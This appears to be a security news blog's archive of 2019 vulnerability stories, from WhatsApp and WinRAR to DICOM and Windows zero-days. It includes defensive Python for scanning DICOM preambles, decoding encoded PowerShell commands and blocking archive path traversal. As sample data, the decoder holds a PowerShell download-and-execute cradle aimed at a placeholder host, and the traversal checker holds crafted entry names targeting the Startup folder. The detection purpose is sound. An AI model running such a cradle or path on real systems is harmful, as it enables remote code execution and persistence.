Category Archives: Vulnerabilities


Since 2005 some Google G Suite passwords were stored in plaintext

Google says that a number of its enterprise customers have had their G Suite passwords stored in plaintext since 2005.

G Suite, Google’s brand of cloud computing, software, productivity and collaboration tools, has more than 5 million users as of February. Google said that it recently discovered that the passwords of a “subset of enterprise G Suite customers” had been stored in plaintext since 2005.

“This practice did not live up to our standards,” Suzanne Frey, VP of engineering for Google Cloud Trust, said in a post. “To be clear, these passwords remained in our secure encrypted infrastructure. This issue has been fixed and we have seen no evidence of improper access to or misuse of the affected passwords.”

Google said it also discovered a second security lapse earlier this month while troubleshooting new G Suite customer sign-ups. The company said since January it was … Read the rest


Patch That WhatsApp Zero-Day Exploit

Facebook has recently patched a critical zero-day vulnerability in WhatsApp, and WhatsApp is urging users to update as soon as possible: attackers were able to exploit it remotely to install spyware on a phone simply by placing a call to the targeted device.

WhatsApp did not name the threat actor exploiting CVE-2019-3568; it described the attackers as an “advanced cyber actor” that targeted “a select number of users.”

WhatsApp’s advisory, issued Monday, confirmed that the flaw, now patched, is a buffer overflow in WhatsApp’s VoIP stack that allows remote code execution via a specially crafted series of SRTCP (Secure Real-time Transport Control Protocol) packets sent to a target phone number.

“A buffer overflow vulnerability in WhatsApp VOIP stack allowed remote code execution via specially crafted series of SRTCP packets sent to a target phone number,” reads the advisory published by Facebook.

Facebook, however, fixed the issue with the release of WhatsApp … Read the rest


Everyone Needs To Patch 3 Nvidia Driver Flaws

If you're a business, a gamer or just a regular person using Nvidia graphics hardware, you need to patch the Nvidia display driver as soon as possible because of the following three flaws.

“[The driver] contains a vulnerability in the kernel mode layer (nvlddmkm.sys) handler for DxgkDdiEscape, where the product does not properly synchronize shared data, such as static variables across threads, which can lead to undefined behavior and unpredictable data changes, which may lead to denial of service, escalation of privileges or information disclosure.”

The most severe of the three is CVE-2019-5675. According to the advisory Nvidia released on Thursday, it could be used to launch a denial-of-service attack that cripples the system, to escalate privileges, or to disclose system information.

The second flaw, CVE-2019-5676, exists in the driver's software install package and is also rated high severity. The software actually … Read the rest


Malware Can Hide Within DICOM Medical Images

Researchers have shown that malware can hide inside DICOM medical images, the file format used for the X-ray, CT and MRI scans that doctors view.

The analyst, Markel Picado Ortiz, was able to take advantage of a DICOM design flaw that allows the “128-byte section at the beginning of the file, called the preamble” to be injected with malware.

“By mixing in with protected health information malware can effectively exploit the data’s clinical and regulatory implications to evade detection and derail remediation attempts while creating a host of new concerns for security teams, healthcare organizations, and antivirus companies in the process,” Ortiz wrote.

“This vulnerability stands apart as one whose technical potency is derived from not just a software design flaw, but from the clinical and regulatory environment as well,” he added.

If hackers were to exploit the design flaw in DICOM, they’d be able … Read the rest
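A defender's check that follows from the flaw, added here as an illustration and not taken from Ortiz's write-up: a DICOM part-10 file begins with 128 preamble bytes that the standard leaves unstructured, followed by the four-byte magic DICM at offset 128. DICOM readers never interpret the preamble, so a polyglot can place an executable header there (the two-byte MZ signature of a Windows executable fits easily) while the file remains a valid image. The scanner below flags such preambles and the neutraliser zeroes the preamble so the file stops being an executable while the image data is untouched. The sample files are constructed byte strings, not real scans, and the list of executable magics is an assumption; so is treating a zero-filled preamble as the benign norm.

```python
DICM_OFFSET = 128   # preamble occupies bytes 0..127; "DICM" must follow at byte 128

# Magic bytes that, placed at the start of the preamble, make the file a runnable polyglot.
# Illustrative list (assumption): Windows DOS/PE, ELF, and shebang scripts.
EXECUTABLE_MAGIC = {
    b"MZ": "Windows executable (DOS/PE header)",
    b"\x7fELF": "ELF executable",
    b"#!": "script with shebang",
}


def scan_preamble(data: bytes) -> str:
    """Classify a file as 'not_dicom', 'executable_preamble', 'nonzero_preamble' or 'clean'."""
    if len(data) < DICM_OFFSET + 4 or data[DICM_OFFSET:DICM_OFFSET + 4] != b"DICM":
        return "not_dicom"
    preamble = data[:DICM_OFFSET]
    for magic in EXECUTABLE_MAGIC:
        if preamble.startswith(magic):
            return "executable_preamble"
    # Non-zero bytes are permitted by the standard (some dual-format files use them),
    # so this is a review flag rather than a verdict.
    if any(preamble):
        return "nonzero_preamble"
    return "clean"


def neutralize_preamble(data: bytes) -> bytes:
    """Zero the preamble of a DICOM file; viewers ignore it, so the image is unaffected."""
    if scan_preamble(data) == "not_dicom":
        raise ValueError("not a DICOM part-10 file")
    return b"\x00" * DICM_OFFSET + data[DICM_OFFSET:]


# Constructed samples (not real scans). A minimal (0002,0000) group-length element
# stands in for the file meta information that follows "DICM".
DICOM_BODY = b"DICM" + b"\x02\x00\x00\x00UL\x04\x00\x00\x00\x00\x00"
CLEAN_FILE = b"\x00" * DICM_OFFSET + DICOM_BODY
# A fake DOS header: "MZ" plus filler to pad out the 128-byte preamble.
POLYGLOT_FILE = b"MZ" + b"\x90" * (DICM_OFFSET - 2) + DICOM_BODY
PLAIN_EXE = b"MZ" + b"\x00" * 300          # an executable with no DICM magic at all


if __name__ == "__main__":
    for name, blob in [("clean", CLEAN_FILE), ("polyglot", POLYGLOT_FILE), ("exe", PLAIN_EXE)]:
        print(f"{name:9s} -> {scan_preamble(blob)}")
    print("after neutralising:", scan_preamble(neutralize_preamble(POLYGLOT_FILE)))
```

Neutralising is the remediation that does not touch protected health information: the pixel data and the patient attributes live after the DICM marker and are copied through unchanged, so the file can be kept in the archive while the executable half of the polyglot is gone.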


Windows Zero-Day Exploit

Microsoft has recently released a patch for a vulnerability in the Windows operating system that was unknown to most people until last week. The vulnerability would allow a hacker to open the door to full system control.

Discovered by Vasily Berdnikov and Boris Larin of Kaspersky Lab on St. Patrick’s Day this year, the flaw (CVE-2019-0859) is a use-after-free in the Windows kernel that allows local privilege escalation (LPE). It is being used in advanced persistent threat (APT) campaigns targeting 64-bit versions of Windows (from Windows 7 to older builds of Windows 10).

win32k!xxxFreeWindow+0x1344 on up-to-date Windows 7 SP1 x64

The exploit we found in the wild was targeting 64-bit versions of Windows (from Windows 7 to older builds of Windows 10) and exploited the vulnerability using the well-known HMValidateHandle technique to bypass ASLR.

After a successful exploitation, the exploit executed PowerShell with a Base64 encoded command. … Read the rest
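The last step Kaspersky describes, PowerShell launched with a Base64-encoded command, is a reliable hunting signal because the switch and its argument are visible in process-creation logs. The Python below is an added example and not Kaspersky's or Microsoft's code: it recognises the -EncodedCommand switch and its accepted abbreviations in a process command line and decodes the UTF-16LE Base64 payload for triage. The command lines are constructed samples; the switch-matching rule is my understanding of how powershell.exe resolves its switches and is treated as an assumption.

```python
import base64
import re

UNDECODABLE = "<encoded command present but not decodable>"


def encode_for_powershell(script: str) -> str:
    """Build the argument PowerShell expects after -EncodedCommand: Base64 of UTF-16LE text."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def is_encoded_command_switch(token: str) -> bool:
    """powershell.exe takes -EncodedCommand, any prefix of it starting with 'e' (-e, -enc, ...)
    and the special form -ec; this matching rule is an assumption of the example."""
    if len(token) < 2 or token[0] not in "-/":
        return False
    switch = token[1:].lower()
    return switch.startswith("e") and ("encodedcommand".startswith(switch) or switch == "ec")


def decode_encoded_command(cmdline: str):
    """Return the decoded script when cmdline starts PowerShell with an encoded command,
    UNDECODABLE when the switch is present but the payload is malformed, else None."""
    tokens = cmdline.split()   # whitespace split is enough: the Base64 blob contains no spaces
    if not tokens:
        return None
    exe = tokens[0].strip('"')
    if not re.search(r"(?:^|\\)(?:powershell|pwsh)(?:\.exe)?$", exe, re.IGNORECASE):
        return None
    for switch, value in zip(tokens, tokens[1:]):
        if is_encoded_command_switch(switch):
            try:
                return base64.b64decode(value, validate=True).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return UNDECODABLE   # still worth an alert: the switch is there
    return None


# Constructed process command lines (not real telemetry).
STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2')"
SAMPLE_CMDLINES = [
    "powershell.exe -NoP -W Hidden -enc " + encode_for_powershell(STAGER),
    r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1",
    "cmd.exe /c whoami",
]

if __name__ == "__main__":
    for line in SAMPLE_CMDLINES:
        print(repr(decode_encoded_command(line)), "<-", line[:60])
```

Decoding rather than merely matching the switch matters for triage: the decoded text is what a download cradle or a staged loader actually looks like, and it is what the analyst pivots on next. Administrative scripts also use -EncodedCommand, so the decoded content, not the switch alone, decides whether the event is an incident.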


BAE Report States HUMAN ERROR still major Security Risk

BAE Systems has revealed that, even though organizations keep trying to improve their cybersecurity, human error is still the biggest vulnerability in an organization's network.

The report was compiled by speaking to board-level executives, IT decision makers and security professionals to understand the current state of corporate incident response capabilities and readiness.

The results were as expected: the BAE Systems research showed that the majority of organizational breaches are caused by human error, and attackers prey on uninformed employees.

Of the breaches caused by human error, 71 percent were attributed to phishing attacks and 65 percent to indirect virus and malware infections.

Response Teams Saw A Rise In Incidents

BAE Systems also found that incident response teams are handling a growing number of incidents per month.

The research also revealed that many … Read the rest


Counter-Strike 1.6 servers used to push malware

About 39% of all Counter-Strike 1.6 servers were being used to push malware to players. It is remarkable that Counter-Strike 1.6 is still being played after 20 years: the game still has many players, and there is strong demand for hosting providers that rent game servers to them.

Dr. Web researchers explained that the Trojan's developer is exploiting vulnerabilities in the game client to spread the Belonard Trojan, deploying malicious servers that infect the players who connect and then use them to promote further game servers and enlist more victims into the botnet. At its peak the botnet grew so large that approximately 39% of the roughly 5,000 Counter-Strike 1.6 servers were part of it and infecting the players who connected.

“Using this pattern, the developer of the Trojan managed to create a botnet that makes up a considerable part of the CS 1.6 game servers,” stated the research by Dr. Web. “According to our … Read the rest

The 2019 Threat Report

The new norm in cybersecurity is the discovery of new attack methods and threats emerging daily, along with new vectors being tested by cyber criminals, according to the 2019 Webroot Threat Report.

According to the Webroot Threat Report:

  • 40 percent of malicious URLs were found on good domains, “since legitimate websites are frequently compromised to host malicious content. Those who use intermediary devices without SSL inspection capabilities should be aware of potential loopholes in their security policies due to this behavior.”

  • Home users are more than twice as likely to be infected.
    Home users are not immune: their routers serve as the hub for their networks and smart-home (IoT) devices, yet most users can't log into their Linux-based routers to see what they are doing. Meanwhile a hacker who gets onto the router can learn everything about the user's environment, redirect URLs, carry out man-in-the-middle attacks and even inject cryptojacking scripts.
Read the rest

Cisco SOHO VPN Firewalls Vulnerable To Remote Code Execution

Cisco has recently released security software updates for its RV-series wireless VPN firewalls and routers to plug a remote code execution flaw (CVE-2019-1663) that can be exploited with malicious HTTP requests.

The Vulnerable Products
This vulnerability affects all releases of the following Cisco products prior to those listed in Fixed Releases:
  • RV110W Wireless-N VPN Firewall
  • RV130W Wireless-N Multifunction VPN Router
  • RV215W Wireless-N VPN Router

“The vulnerability is due to improper validation of user-supplied data in the web-based management interface. An attacker could exploit this vulnerability by sending malicious HTTP requests to a targeted device. A successful exploit could allow the attacker to execute arbitrary code on the underlying operating system of the affected device as a high-privilege user.”

Cisco did not say whether public exploit code was available in the wild.

The flaw is quite … Read the rest


Users Affected by 19 Year Old WinRAR Flaw

WinRAR, one of the world's most popular compression tools, is urging its 500 million users to update: a flaw that has affected every version released in the past 19 years has finally been patched.

What is the vulnerability?

The UNACEv2.DLL vulnerability was discovered by security researchers at Check Point Software, who noted that it affects all WinRAR versions released in the last 19 years. The flaw lets an attacker deliver a crafted archive to a user; when the user extracts it, a malicious file can be written into the Windows Startup folder, where it executes the next time the user logs in.

WinRAR has released WinRAR 5.70 Beta 2, which addresses this vulnerability, tracked as CVE-2018-20250, CVE-2018-20251, CVE-2018-20252 and CVE-2018-20253.

Read the rest
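The bug class here is an extractor honouring a path inside the archive that points outside the destination directory, which is how a file ends up in the Startup folder. As an added illustration (not WinRAR's or Check Point's code, and not a parser for the ACE format), the Python below shows the check an extractor must make before writing each entry, using Windows path rules so that it runs on any platform. The entry names and the destination directory are constructed for the example.

```python
import ntpath

# Windows Startup folder below a user profile: anything written here runs at the next login.
STARTUP_SUFFIX = r"AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
DEST_ROOT = r"C:\Users\victim\Downloads\archive"   # assumed extraction directory


def is_safe_entry(dest_root: str, entry_name: str) -> bool:
    """True only if writing entry_name under dest_root cannot escape dest_root."""
    name = entry_name.replace("/", "\\")            # archives may carry either separator
    if ntpath.splitdrive(name)[0] or name.startswith("\\"):
        return False                                # drive letters, UNC paths, rooted paths
    root = ntpath.normpath(dest_root)
    target = ntpath.normpath(ntpath.join(root, name))   # collapses every ".." component
    return target == root or target.startswith(root + "\\")


def plan_extraction(dest_root: str, entry_names):
    """Split archive entries into the ones an extractor may write and the ones it must refuse."""
    accepted, rejected = [], []
    for name in entry_names:
        (accepted if is_safe_entry(dest_root, name) else rejected).append(name)
    return accepted, rejected


# Constructed entry names, not taken from a real archive.
SAMPLE_ENTRIES = [
    r"report\scan.pdf",
    "images/../readme.txt",                                               # inside after normalising
    ntpath.join(r"..\..\..\Users\victim", STARTUP_SUFFIX, "update.exe"),  # traversal into Startup
    ntpath.join(r"C:\Users\victim", STARTUP_SUFFIX, "update.exe"),        # absolute path
    r"\\fileserver\share\update.exe",                                     # UNC path
    r"\Users\victim\update.exe",                                          # rooted on current drive
]

if __name__ == "__main__":
    ok, bad = plan_extraction(DEST_ROOT, SAMPLE_ENTRIES)
    print("would write:", *ok, sep="\n  ")
    print("refused:", *bad, sep="\n  ")
```

The comparison is done on the normalised absolute target rather than on the raw entry name, because rejecting the literal string ".." misses rooted paths, drive-relative paths and mixed separators; a check that only looks at the name is exactly the kind that decades-old archive code tends to get wrong.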